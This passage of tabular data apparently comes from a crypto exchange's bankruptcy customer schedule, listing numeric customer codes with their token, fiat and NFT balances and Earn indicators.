| 07359431 | | CUSDT[2], DOGE[0], TRX[2], USD[0.00] | Yes | |
| 07359432 | | USD[10.00] | | |
| 07359433 | | USD[0.00] | | |
| 07359434 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07359435 | | USD[10.00] | | |
| 07359436 | | USD[10.00] | | |
| 07359437 | | USD[10.00] | | |
| 07359438 | | USD[0.00] | | |
| 07359439 | | USD[10.00] | | |
| 07359440 | | USD[10.00] | | |
| 07359441 | | BRZ[1], CUSDT[12], TRX[1], USD[0.00], USDT[1.1092352] | Yes | |
| 07359442 | | USD[10.00] | | |
| 07359443 | | USD[10.00] | | |
| 07359444 | | USD[10.00] | | |
| 07359445 | | ETH[.00465545], ETHW[.00465545], NFT (50845199120123569 0/FTX - Off The Grid Miami #2024)[1], TRX[1], USD[0.00] | | |
| 07359446 | | USD[10.00] | | |
| 07359447 | | DOGE[33.14898739], USD[0.00] | | |
| 07359448 | | USD[65.67] | | |
| 07359449 | | USD[10.00] | | |
| 07359450 | | BAT[52.10741245], CUSDT[6], DOGE[551.35229296], ETH[.00621461], ETHW[.00613247], GRT[91.23508931], SUSHI[10.41259067], TRX[1322.94122426], USD[0.95] | Yes | |
| 07359452 | | USD[10.00] | | |
| 07359453 | | DOGE[667.71012796], USD[10.00] | | |
| 07359454 | | USD[10.43] | Yes | |
| 07359455 | | DOGE[0], TRX[1], UNI[0], USD[0.00] | | |
| 07359456 | | LINK[7.11480105], USD[0.18] | | |
| 07359457 | | CUSDT[7], DOGE[1153.63542972], GRT[54.06363281], TRX[750.38345853], USD[-45.00] | Yes | |
| 07359458 | | USD[10.00] | | |
| 07359459 | | USD[10.00] | | |
| 07359461 | | USD[0.00] | Yes | |
| 07359463 | | BRZ[1], CUSDT[1], DOGE[1], GRT[4.23417461], SOL[.00008067], TRX[6], USD[0.01] | Yes | |
| 07359464 | | DOGE[1.01318556], USD[0.00] | | |
| 07359465 | | AVAX[.06811], BTC[0], ETH[0], NFT (349316501406896738/Coachella x FTX Weekend 2 #15345)[1], NFT (353729317852044808/Entrance Voucher #4458)[1], NFT (398764003880302621/Romeo #1718)[1], SOL[0], USD[1.34], USDT[0.00000001] | | |
| 07359466 | | USD[10.00] | | |
| 07359467 | | USD[10.00] | | |
| 07359468 | | BTC[.0001611], CUSDT[3], DOGE[6524.39903527], ETH[.18723132], ETHW[.18699534], SOL[.33742195], TRX[1], USD[0.01] | Yes | |
| 07359469 | | USD[0.01] | | |
| 07359470 | | BAT[0], BRZ[1], BTC[0], CUSDT[2], DOGE[1.25505401], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07359471 | | CUSDT[2], DOGE[.00076141], TRX[2], USD[0.00] | | |
| 07359472 | | USD[10.00] | | |
| 07359473 | | BAT[1], BRZ[2], CUSDT[5], DOGE[1], TRX[2], USD[0.01] | | |
| 07359475 | | BAT[0], CUSDT[5], DOGE[487.91382018], SHIB[3205.75406346], USD[0.01], USDT[0] | Yes | |
| 07359476 | | CUSDT[2], DOGE[7507.12747942], TRX[1682.68402264], USD[-79.00] | | |
| 07359477 | | USD[10.00] | | |
| 07359479 | | BRZ[1], DOGE[1], USD[0.01], USDT[1] | | |
| 07359480 | | USD[10.00] | | |
| 07359481 | | BTC[0], ETH[.00000001], SOL[.00576047], USD[20.00], USDT[0.00000001] | Yes | |
| 07359482 | | USD[10.00] | | |
| 07359483 | | BTC[0], GRT[.616], SOL[.868], SUSHI[.338], USD[0.44] | | |
| 07359484 | | USD[10.00] | | |
| 07359485 | | SOL[.24322408], USD[0.00] | | |
| 07359487 | | USD[10.00] | | |
| 07359488 | | USD[10.00] | | |
| 07359489 | | USD[10.00] | | |
| 07359490 | | BTC[.00018088], ETH[.225096], ETHW[.225096], LINK[5.916], SUSHI[30.876] | | |
| 07359491 | | BTC[0], DOGE[0], ETH[0], SOL[0] | | |
| 07359492 | | USD[10.00] | | |
| 07359493 | | USD[10.00] | | |
| 07359494 | | CUSDT[1], DOGE[209.98769442], ETH[.0139712], ETHW[.0139712], USD[0.00] | | |
| 07359496 | | CUSDT[1], DOGE[1591.41488618], SHIB[404694.4558883], USD[0.00] | | |
| 07359497 | | BRZ[1], BTC[.00221215], USD[0.00] | Yes | |
| 07359499 | | USD[10.88] | Yes | |
| 07359500 | | CUSDT[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07359501 | | BRZ[1], CUSDT[6], ETH[.14953603], ETHW[.14953603], TRX[1], USD[0.07] | | |
| 07359502 | | USD[10.84] | Yes | |
| 07359503 | | BRZ[1], CUSDT[3], TRX[3], USD[0.01], USDT[1] | | |
| 07359504 | | USD[10.00] | | |
| 07359505 | | USD[10.00] | | |
| 07359506 | | BTC[.00020048], USD[0.00] | | |
| 07359507 | | USD[10.00] | | |
| 07359508 | | DOGE[.00196191], SHIB[216686.99826594], USD[0.22] | Yes | |
| 07359509 | | USD[10.00] | | |
| 07359510 | | DOGE[1.00001048], USD[0.01] | | |
| 07359511 | | USD[10.00] | | |
| 07359512 | | LINK[.51149727], USD[0.00] | Yes | |
| 07359513 | | USD[10.00] | | |
| 07359514 | | USD[10.00] | | |
| 07359515 | | USD[10.00] | | |
| 07359516 | | USD[10.00] | | |
| 07359517 | | USD[10.00] | | |
| 07359518 | | USD[10.00] | | |
| 07359519 | | USD[11.01] | Yes | |
| 07359521 | | USD[10.00] | | |
| 07359522 | | USD[0.00] | | |
| 07359523 | | TRX[.00019543], USD[0.00] | | |
| 07359524 | | DOGE[0], ETH[.00000001], ETHW[0], USD[0.70] | | |
| 07359526 | | USD[10.00] | | |
| 07359527 | | USD[10.00] | | |
| 07359528 | | BTC[.000277], CUSDT[1], DOGE[508.5014851], ETH[.00709984], ETHW[.00709984], USD[0.00] | | |
| 07359529 | | USD[10.00] | | |
| 07359530 | | CUSDT[1], NFT (328611025543966051/Entrance Voucher #29556)[1], USD[0.00] | | |
| 07359531 | | USD[10.00] | | |
| 07359532 | | USD[10.00] | | |
| 07359533 | | USD[10.00] | | |
| 07359534 | | CUSDT[2], USD[0.00] | Yes | |
| 07359535 | | USD[10.00] | | |
| 07359537 | | USD[10.00] | | |
| 07359538 | | CUSDT[2], DOGE[3.20342423], USD[0.00] | | |
| 07359539 | | BRZ[1], CUSDT[1], DOGE[12494.35029008], USD[0.00] | | |
| 07359540 | | DOGE[4.00004689], USD[0.17] | | |
| 07359542 | | USD[10.00] | | |
| 07359543 | | USD[10.31] | Yes | |
| 07359544 | | USD[10.00] | | |
| 07359546 | | USD[10.00] | | |
| 07359547 | | USD[10.00] | | |
| 07359548 | | USD[0.00] | | |
| 07359549 | | USD[10.00] | | |
| 07359550 | | AAVE[0], BAT[0], BCH[0], BTC[0], CUSDT[0], DAI[0], DOGE[1.00190860], ETH[0], ETHW[0], GRT[0], LTC[0], PAXG[0], SOL[0], TRX[0], USD[0.09], USDT[0.00000001], WBTC[0] | | |
| 07359551 | | USD[10.00] | | |
| 07359552 | | TRX[2], USD[0.00] | Yes | |
| 07359553 | | USD[10.00] | | |
| 07359554 | | USD[10.00] | | |
| 07359555 | | BTC[.00018874], USD[0.00] | | |
| 07359556 | | USD[0.01] | | |
| 07359557 | | USD[10.00] | | |
| 07359558 | | USD[10.00] | | |
| 07359559 | | USD[0.00] | Yes | |
| 07359561 | | BAT[1.0165555], CUSDT[1], TRX[2], USD[0.00] | Yes | |
| 07359562 | | CUSDT[1], LINK[.32509153], USD[0.00] | | |
| 07359563 | | CUSDT[4.00002872], DOGE[.50880321], TRX[.00825906], USD[0.25] | | |
| 07359564 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07359565 | | USD[10.00] | | |
| 07359566 | | USD[10.00] | | |
| 07359567 | | USD[10.00] | | |
| 07359568 | | USD[10.00] | | |
| 07359569 | | USD[10.00] | | |
| 07359570 | | USD[10.00] | | |
| 07359571 | | CUSD[3], DOGE[962.75204958], KSHIB[3433.32763832], TRX[440.43852255], USD[0.01] | Yes | |
| 07359572 | | USD[10.00] | | |
| 07359573 | | USD[10.44] | Yes | |
| 07359574 | | CUSDT[2], DOGE[.00001882], USD[0.00] | | |
| 07359576 | | USD[10.00] | | |
| 07359577 | | BCH[.00000001], BTC[.00017918], SUSHI[.00000076], USD[0.00], USDT[0.00000001] | Yes | |
| 07359578 | | BRZ[3], CUSDT[24], DOGE[0], ETH[0.91763251], ETHW[0.84425996], NFT (388276009885669392/Ghoulie #7050)[1], SHIB[2], SOL[9.51554808], TRX[14], USD[1336.76], USDT[0] | | |
| 07359580 | | DOGE[.661], USD[0.00] | | |
| 07359581 | | BTC[.00085967], CUSDT[10], DOGE[806.41819722], SHIB[963747.13507128], TRX[367.53221846], USD[24.96] | Yes | |
| 07359582 | | USD[10.00] | | |
| 07359583 | | USD[10.00] | | |
| 07359584 | | DOGE[.0037818], USD[0.00] | | |
| 07359585 | | CUSDT[5], TRX[4], USD[0.00], USDT[1.02543197] | Yes | |
| 07359586 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07359587 | | CUSDT[4], DOGE[.00349768], TRX[1.00076137], USD[0.00], USDT[0.00414525] | | |
| 07359588 | | USD[10.00] | | |
| 07359589 | | DOGE[1], USD[10.34] | | |
| 07359590 | | USD[0.00] | | |
| 07359591 | | DOGE[33.29467377], USD[0.00] | | |
| 07359592 | | USD[10.00] | | |
| 07359593 | | CUSDT[1], TRX[1], USD[99.33] | Yes | |
| 07359594 | | USD[10.00] | | |
| 07359595 | | BF_POINT[200], SOL[0], USD[0.00] | Yes | |
| 07359596 | | SOL[0], USD[0.00] | | |
| 07359597 | | USD[10.03] | Yes | |
| 07359598 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07359599 | | SHIB[2437493.00006877], USD[0.00] | Yes | |
| 07359600 | | BRZ[1], CUSDT[3], DOGE[3079.36032838], TRX[564.99182608], USD[0.00] | Yes | |
| 07359601 | | USD[10.00] | | |
| 07359602 | | USD[10.00] | | |
| 07359603 | | BRZ[2], DOGE[6], SOL[0], TRX[1], USD[0.00] | | |
| 07359604 | | USD[0.01], USDT[0] | | |
| 07359605 | | DAI[0.07771033], DOGE[2.25], ETH[.00000068], ETHW[0.00000067], LINK[.00000001], TRX[1], USD[0.00] | | |
| 07359606 | | CUSDT[7], DOGE[2], ETH[.05754263], ETHW[.05683023], SHIB[1666801.82436012], TRX[4], USD[0.00] | Yes | |
| 07359607 | | BRZ[1], CUSDT[2], DOGE[0], TRX[3], USD[0.00] | | |
| 07359608 | | CUSDT[2], DOGE[1492.91282247], USD[0.00] | Yes | |
| 07359609 | | USD[10.00] | | |
| 07359610 | | BRZ[2], CUSDT[24], DOGE[515.39897378], SHIB[5], TRX[5], USD[0.01] | | |
| 07359611 | | MATIC[3.93101639], NFT (566766556472943656/FTX - Off The Grid Miami #1937)[1], USD[0.03] | Yes | |
| 07359612 | | DOGE[1], MATIC[717.83346224], USD[0.00] | Yes | |
| 07359613 | | BRZ[0], DOGE[6808.32199727], ETH[1.05188751], ETHW[1.05188751], USD[0.00] | | |
| 07359614 | | CUSDT[1], USD[0.00] | Yes | |
| 07359615 | | USD[10.00] | | |
| 07359616 | | USD[0.00] | | |
| 07359617 | | CUSDT[1], TRX[1], USD[0.02], USDT[1] | | |
| 07359618 | | USD[10.00] | | |
| 07359619 | | USD[10.00] | | |
| 07359620 | | USD[10.00] | | |
| 07359621 | | ALGO[0], DOGE[0], ETHW[2.37857191], USD[0.00] | Yes | |
| 07359622 | | USD[10.00] | | |
| 07359623 | | USD[10.00] | | |
| 07359624 | | CUSDT[2], NFT (50147162504105530/Cryptotubby #1,612)[1], TRX[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07359625 | | USD[10.00] | | |
| 07359626 | | DOGE[90.5902181], USD[0.00] | | |
| 07359627 | | CUSDT[9], DOGE[2962.22257177], TRX[3], USD[0.00] | | |
| 07359628 | | USD[10.00] | | |
| 07359630 | | CUSDT[2], DOGE[1], USD[3.06] | Yes | |
| 07359631 | | USD[10.00] | | |
| 07359633 | | BRZ[1], CUSDT[1], DOGE[1], GRT[0], SUSHI[0], TRX[2], USD[0.00] | | |
| 07359635 | | BTC[.00000014], DOGE[1], USD[0.00] | | |
| 07359636 | | BRZ[1], BTC[.00000016], CUSDT[3], DOGE[1], SOL[.00002437], TRX[1], USD[0.00] | | |
| 07359637 | | DOGE[14.68122092], USD[0.00] | | |
| 07359639 | | CUSDT[18], TRX[11.21220989], USD[0.01] | | |
| 07359640 | | DOGE[278.04607009], USD[0.90], USDT[0] | | |
| 07359641 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07359642 | | USD[10.00] | | |
| 07359643 | | USD[10.00] | | |
| 07359644 | | USD[10.00] | | |
| 07359645 | | USD[10.00] | | |
| 07359646 | | USD[10.00] | | |
| 07359647 | | BAT[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], USD[0.26] | | |
| 07359648 | | CUSDT[2], DOGE[44.23082846], USD[0.00] | | |
| 07359649 | | USD[10.00] | | |
| 07359650 | | USD[10.00] | | |
| 07359651 | | BTC[.0001734], USD[0.00] | Yes | |
| 07359652 | | USD[10.00] | | |
| 07359653 | | SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07359656 | | BRZ[0], CUSDT[1], DOGE[0], GRT[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07359657 | | USD[10.00] | | |
| 07359658 | | USD[49.84], USDT[0] | | |
| 07359659 | | DOGE[0], ETH[0], SUSHI[0], USD[0.00] | | |
| 07359660 | | BRZ[0], CUSDT[176.56428904], DOGE[0], KSHIB[179.02446796], NFT (2940142106169003023/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #100)[1], NFT (3450389891563344629/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #79)[1], NFT (4796387224383779423/Entrance Voucher #3431)[1], SGD[4.35], TRX[0], USD[7.66] | Yes | |
| 07359662 | | DOGE[0], TRX[1], USD[0.00] | | |
| 07359663 | | USD[10.00] | | |
| 07359664 | | SUSHI[0], USD[0.01], USDT[0] | Yes | |
| 07359666 | | DOGE[.00526829], USD[0.00], USDT[0] | | |
| 07359667 | | USD[10.00] | | |
| 07359669 | | USD[10.00] | | |
| 07359670 | | CUSDT[1], DOGE[54.93133635], TRX[1], USD[0.00] | | |
| 07359671 | | BTC[0], DOGE[0], USD[89.20] | | |
| 07359672 | | USD[10.00] | | |
| 07359674 | | CUSDT[3], DOGE[812.3396149], KSHIB[1594.78830544], SHIB[1], SOL[.28971142], TRX[187.21134511], USD[0.00] | Yes | |
| 07359675 | | BRZ[0.00000035], BTC[0], CUSDT[3], DOGE[6], ETH[0], ETHW[0], SUSHI[0], TRX[0], USD[0.01] | | |
| 07359676 | | BAT[0], BRZ[0], BTC[0], CUSDT[3], DOGE[9], GRT[0], SOL[0], TRX[1723.99225088], USD[0.00] | | |
| 07359678 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07359679 | | BAT[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], USD[0.41], USDT[0] | | |
| 07359680 | | DOGE[25.89038188], USD[0.00] | | |
| 07359681 | | USD[10.00] | | |
| 07359682 | | USD[10.00] | | |
| 07359683 | | USD[10.00] | | |
| 07359684 | | ETH[.00554338], ETHW[.00554338], USD[0.00] | | |
| 07359685 | | USD[10.00] | | |
| 07359686 | | USD[0.00], USDT[0] | | |
| 07359688 | | USD[10.00] | | |
| 07359690 | | USD[10.00] | | |
| 07359691 | | ETH[0], USD[0.00], USDT[0.00002630] | | |
| 07359692 | | USD[0.01] | | |
| 07359693 | | USD[10.00] | | |
| 07359694 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07359695 | | BRZ[1], DOGE[.01476888], TRX[3], USD[0.01] | | |
| 07359696 | | USD[0.00], USDT[0] | Yes | |
| 07359697 | | USD[10.00] | | |
| 07359698 | | CUSDT[2], DOGE[.78285159], ETH[.0002732], ETHW[.0002732], GRT[2], TRX[3], USD[0.00] | | |
| 07359699 | | BRZ[4], BTC[0], CUSDT[4], DOGE[0], ETH[0], ETHW[0], GRT[1], TRX[7], USD[0.01] | | |
| 07359700 | | TRX[1], USD[0.00] | | |
| 07359701 | | BAT[0], BRZ[2], BTC[0], CUSDT[65.826575], DOGE[1], ETH[0], ETHW[0], GRT[1.00498957], SOL[0], TRX[5], USD[0.01], USDT[0] | Yes | |
| 07359702 | | CUSDT[517.47527054], SHIB[2209778.23215036], TRX[80.84418885], USD[0.00] | | |
| 07359704 | | USD[10.00] | | |
| 07359705 | | DOGE[48.78328154], TRX[1], USD[0.00] | | |
| 07359706 | | USD[10.00] | | |
| 07359707 | | CUSDT[1], DOGE[2677.38692391], USD[10.00] | | |
| 07359708 | | USD[10.00] | | |
| 07359709 | | USD[10.00] | | |
| 07359710 | | USD[10.00] | | |
| 07359711 | | DOGE[156.44846822], SHIB[173.09400921], USD[0.00] | Yes | |
| 07359712 | | USD[10.00] | | |
| 07359713 | | USD[0.00] | | |
| 07359714 | | USD[10.00] | | |
| 07359715 | | BRZ[1], CUSDT[2], SOL[0], USD[0.00], USDT[0.00010323] | Yes | |
| 07359717 | | ETH[.00037456], ETHW[.00037456], USD[0.00] | | |
| 07359718 | | USD[10.00] | | |
| 07359719 | | DOGE[137.02386092], USD[0.00] | | |
| 07359720 | | USD[10.00] | | |
| 07359721 | | USD[11.08] | Yes | |
| 07359722 | | GRT[.00002234], USD[0.00] | | |
| 07359723 | | USD[10.00] | | |
| 07359725 | | CUSDT[3], DOGE[284.65768501], SHIB[160362.65953863], SUSHI[5.10251969], TRX[1], USD[0.02] | Yes | |
| 07359726 | | CUSDT[3], DOGE[0], TRX[1], USD[0.00] | | |
| 07359727 | | USD[10.00] | | |
| 07359728 | | DOGE[2908.66713491], SHIB[141890.17903212], USD[0.00] | Yes | |
| 07359729 | | USD[10.00] | | |
| 07359730 | | USD[0.40] | Yes | |
| 07359731 | | USD[10.00] | | |
| 07359732 | | USD[10.00] | | |
| 07359733 | | USD[10.00] | | |
| 07359734 | | USD[10.00] | | |
| 07359735 | | CUSDT[3], DOGE[1761.02176108], SHIB[3367111.26778303], USD[10.00] | | |
| 07359736 | | USD[10.00] | | |
| 07359737 | | USD[10.00] | | |
| 07359738 | | BAT[0], BRZ[1], CUSDT[12], DOGE[0], TRX[1454.80567921], USD[0.01] | Yes | |
| 07359739 | | USD[10.00] | | |
| 07359740 | | TRX[.00510657], USD[0.00] | Yes | |
| 07359741 | | USD[10.00] | | |
| 07359742 | | CUSDT[4], SHIB[743073.11714565], USD[0.00], USDT[1.1020359] | Yes | |
| 07359743 | | USD[10.00] | | |
| 07359744 | | USD[10.00] | | |
| 07359745 | | DOGE[.00005119], TRX[1], USD[0.00] | | |
| 07359746 | | USD[10.00] | | |
| 07359747 | | USD[10.00] | | |
| 07359748 | | USD[10.00] | | |
| 07359751 | | DOGE[0], USD[0.00] | | |
| 07359752 | | BTC[0.00072421], ETHW[.00607486], NFT [384711307469245988/GSW Championship Commemorative Ring)[1], NFT (386015252315122388/GSW Western Conference Finals Commemorative Banner #1136)[1], NFT (397484382215064362/2974 Floyd Norman - OKC 6-0211)[1], NFT (408815059032724847/GSW Western Conference Semifinals Commemorative Ticket #385)[1], NFT (420650845582210035/GSW Western Conference Finals Commemorative Banner #1133)[1], NFT (431141039026317396/Warriors Logo Pin #727 (Redeemed))[1], NFT (456024267121214591/GSW Championship Commemorative Ring)[1], NFT (458897303964806169/GSW 2015 Championship Ring  #9 (Redeemed))[1], NFT (539871293927441561/GSW Round 1 Commemorative Ticket #307)[1], NFT (543624185630568638/GSW Western Conference Finals Commemorative Banner #1134)[1], NFT (546918104727906611/GSW Western Conference Semifinals Commemorative Ticket #384)[1], NFT (551962894150559940/GSW Western Conference Finals Commemorative Banner #1135)[1], USD[0.00] | | |
| 07359754 | | DOGE[0], ETH[0], SOL[0], USD[10.87] | Yes | |
| 07359755 | | CUSDT[1], DOGE[1.00002785], TRX[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07359756 | | BRZ[1], CUSDT[1], DOGE[1112.74178774], SOL[6.25392173], TRX[19.07979221], USD[0.00] | Yes | |
| 07359758 | | USD[10.00] | | |
| 07359759 | | USD[10.00] | | |
| 07359760 | | DOGE[1], GRT[57.61434728], USD[10.00] | | |
| 07359761 | | USD[10.00] | | |
| 07359763 | | USD[10.00] | | |
| 07359764 | | USD[10.00] | | |
| 07359765 | | USD[10.00] | | |
| 07359766 | | BRZ[1], BTC[0.00023207], DOGE[0], ETH[.00000001], ETHW[0], SUSHI[0], USD[0.01] | Yes | |
| 07359767 | | BTC[.00027901], CUSDT[1], DOGE[1.63775367], USD[0.67] | | |
| 07359768 | | USD[10.00] | | |
| 07359770 | | USD[10.00] | | |
| 07359771 | | BTC[.00117981], CUSDT[1], DOGE[1106.99088119], ETH[.53394681], ETHW[.53372252], TRX[3], USD[0.00] | Yes | |
| 07359772 | | CUSDT[2], SHIB[639619.61196675], USD[0.00] | Yes | |
| 07359773 | | USD[10.00] | | |
| 07359774 | | CUSDT[1], DOGE[3], SHIB[2], SOL[.03459044], TRX[2], USD[0.00] | Yes | |
| 07359775 | | USD[10.00] | | |
| 07359776 | | USD[0.00], USDT[1.09912123] | Yes | |
| 07359777 | | USD[10.00] | | |
| 07359778 | | USD[0.01], USDT[0] | | |
| 07359779 | | USD[10.00] | | |
| 07359780 | | USD[10.00] | | |
| 07359781 | | USD[10.00] | | |
| 07359782 | | USD[10.00] | | |
| 07359783 | | DOGE[9342.21641094], TRX[1], USD[10.00] | | |
| 07359784 | | USD[10.00] | | |
| 07359785 | | USD[10.00] | | |
| 07359786 | | BRZ[2], CUSDT[1], USD[0.00] | | |
| 07359787 | | BRZ[0.00000001], CUSDT[5], DOGE[42.32200866], LINK[.47250383], SUSHI[1.0220896], TRX[121.76738788], USD[0.00] | | |
| 07359789 | | TRX[1], USD[0.01] | | |
| 07359790 | | USD[10.00] | | |
| 07359791 | | DOGE[.33955996], USD[0.00] | Yes | |
| 07359792 | | BRZ[1], CUSDT[7], DOGE[2127.10522045], SHIB[1586886.11071235], TRX[1], USD[0.00] | Yes | |
| 07359794 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07359795 | | CUSDT[2], DOGE[69.36487778], USD[0.00] | | |
| 07359796 | | DOGE[1], SOL[.56153858], USD[0.00] | | |
| 07359797 | | USD[10.00] | | |
| 07359798 | | USD[10.00] | | |
| 07359799 | | CUSDT[1], USD[0.00] | | |
| 07359800 | | CUSDT[3], DOGE[48.17042947], USD[0.00] | | |
| 07359801 | | USD[10.00] | | |
| 07359802 | | USD[10.00] | | |
| 07359803 | | USD[10.00] | | |
| 07359804 | | USD[0.00] | | |
| 07359805 | | BCH[0], BTC[0], CUSDT[2], DAI[0], DOGE[1], ETH[0], LTC[0], SOL[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07359806 | | USD[10.00] | | |
| 07359807 | | USD[0.66], USDT[0] | Yes | |
| 07359808 | | BRZ[2], CUSDT[13], DOGE[4728.95930294], GRT[1], SHIB[2], TRX[7], USD[0.00], USDT[0.01836354] | Yes | |
| 07359809 | | USD[10.00] | | |
| 07359810 | | USD[10.00] | | |
| 07359812 | | CUSDT[2], DOGE[1058.0673598], TRX[205.14756264], USD[0.00] | | |
| 07359813 | | CUSDT[1.00000188], USD[0.00] | | |
| 07359814 | | CUSDT[1], ETH[.25806875], ETHW[.25806875], TRX[2], USD[0.34] | | |
| 07359815 | | USD[10.00] | | |
| 07359816 | | USD[0.00] | | |
| 07359818 | | USD[10.00] | | |
| 07359819 | | BRZ[1], CUSDT[311.30378949], DOGE[1], KSHIB[2161.62343169], USD[0.00] | Yes | |
| 07359821 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07359822 | | BTC[.00005905], USD[10.00] | | |
| 07359824 | | BRZ[0], CUSDT[1], DOGE[0], TRX[0], USD[0.00] | | |
| 07359825 | | USD[0.00] | | |
| 07359826 | | DOGE[1], GRT[5.21646972], TRX[120.9321467], USD[0.00] | Yes | |
| 07359827 | | USD[10.00] | | |
| 07359828 | | DOGE[0], ETH[0.01728581], ETHW[0.01728581], GRT[0], SOL[2.91213260], SUSHI[0], TRX[974.06503673], USD[8.86] | | |
| 07359829 | | USD[10.00] | | |
| 07359830 | | BAT[0], BTC[0], DOGE[0], ETH[0], LINK[0], PAXG[0], TRX[0], USD[0.00], USDT[0] | | |
| 07359831 | | USD[10.00] | | |
| 07359832 | | USD[0.00] | | |
| 07359833 | | BAT[.818], BTC[.05427044], DOGE[1417], ETH[.189], LINK[3.1658], SOL[6.45437], SUSHI[.376], USD[0.04], USDT[0.31639000] | | |
| 07359836 | | USD[0.00] | | |
| 07359837 | | CUSDT[1], DOGE[514.75551936], USD[0.00] | | |
| 07359838 | | USD[10.00] | | |
| 07359839 | | USD[10.00] | | |
| 07359840 | | BAT[11.14430025], BRZ[0], CUSDT[4], DOGE[2.35386665], SOL[0.00069274], SUSHI[0], TRX[107.14201227], USD[0.00], USDT[0], YFI[0] | | |
| 07359841 | | USD[10.00] | | |
| 07359843 | | USD[10.00] | | |
| 07359844 | | DOGE[.12911384], SOL[0], TRX[0.00466200], USD[0.00], YFI[0] | | |
| 07359845 | | DOGE[1], TRX[1507.46208808], USD[10.00] | | |
| 07359846 | | USD[10.00] | | |
| 07359847 | | USD[10.00] | | |
| 07359848 | | DOGE[2014.84891103], USD[16.20] | Yes | |
| 07359849 | | BRZ[1], CUSDT[4], DOGE[3726.50078677], USD[0.14] | Yes | |
| 07359850 | | USD[10.00] | | |
| 07359851 | | TRX[221.58186091], USD[0.00] | Yes | |
| 07359852 | | DOGE[1], SOL[.00020718], SUSHI[.64028712], USD[0.00] | Yes | |
| 07359853 | | BAT[.83708095], BTC[0.00027064], ETH[.00041529], ETHW[.00041529], LTC[0.00000490], USD[0.00] | | |
| 07359854 | | CUSDT[1], USD[39.69] | | |
| 07359855 | | BAT[1], BRZ[2], BTC[.00002722], CUSDT[3], DOGE[0], TRX[2], USD[0.00], USDT[0.00002498] | | |
| 07359856 | | USD[0.41], USDT[7.242156] | | |
| 07359857 | | BRZ[1], CUSDT[4], DOGE[26.58660452], USD[0.00] | | |
| 07359858 | | CUSDT[3], DOGE[361.58350416], GRT[198.35666742], USD[0.00] | Yes | |
| 07359862 | | USD[10.00] | | |
| 07359863 | | BRZ[3], CUSDT[9], DOGE[4], TRX[4], USD[251.86] | | |
| 07359864 | | CUSDT[1], DOGE[.00003876], USD[0.00] | | |
| 07359865 | | DOGE[130.71065027], USD[0.00] | | |
| 07359866 | | USD[10.00] | | |
| 07359867 | | DOGE[.267], USD[0.74] | | |
| 07359868 | | CUSDT[3], DOGE[2], SHIB[668827.37141687], TRX[1], USD[0.00] | | |
| 07359869 | | USD[10.00] | | |
| 07359870 | | USD[10.00] | | |
| 07359871 | | USD[10.00] | | |
| 07359872 | | BTC[.00003587], DOGE[0.62013742], ETH[.00088642], ETHW[.00088642], SOL[.00119289], USD[12192.40] | | |
| 07359873 | | USD[0.00] | Yes | |
| 07359874 | | USD[10.00] | | |
| 07359876 | | USD[10.00] | | |
| 07359877 | | BAT[166.93190724], BF_POINT[300], BRZ[4], CUSDT[4], DOGE[19.70260265], ETH[0.00000037], ETHW[0.00000037], GRT[1], LTC[0], SHIB[5], SUSHI[0], TRX[3], USD[0.00], USDT[2.1745398] | Yes | |
| 07359878 | | BRZ[1], CUSDT[1], DOGE[244.16011781], ETH[.03283404], ETHW[.03283404], USD[0.52] | | |
| 07359879 | | USD[10.00] | | |
| 07359880 | | USD[10.00] | | |
| 07359882 | | USD[10.00] | | |
| 07359883 | | BCH[.29403373], BRZ[1], BTC[.04971129], CUSDT[6], DOGE[2746.57705321], ETH[.45508862], ETHW[.45489745], KSHIB[694.52942783], LINK[5.11975241], LTC[.69234494], MATIC[42.83278102], SHIB[755636.34129615], TRX[440.13132099], USD[0.15] | Yes | |
| 07359884 | | USD[10.00] | | |
| 07359886 | | USD[10.00] | | |
| 07359887 | | BTC[.00014252], GRT[0], LTC[0], USD[0.00] | | |
| 07359888 | | BRZ[0], BTC[0], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07359889 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07359890 | | USD[0.00] | | |
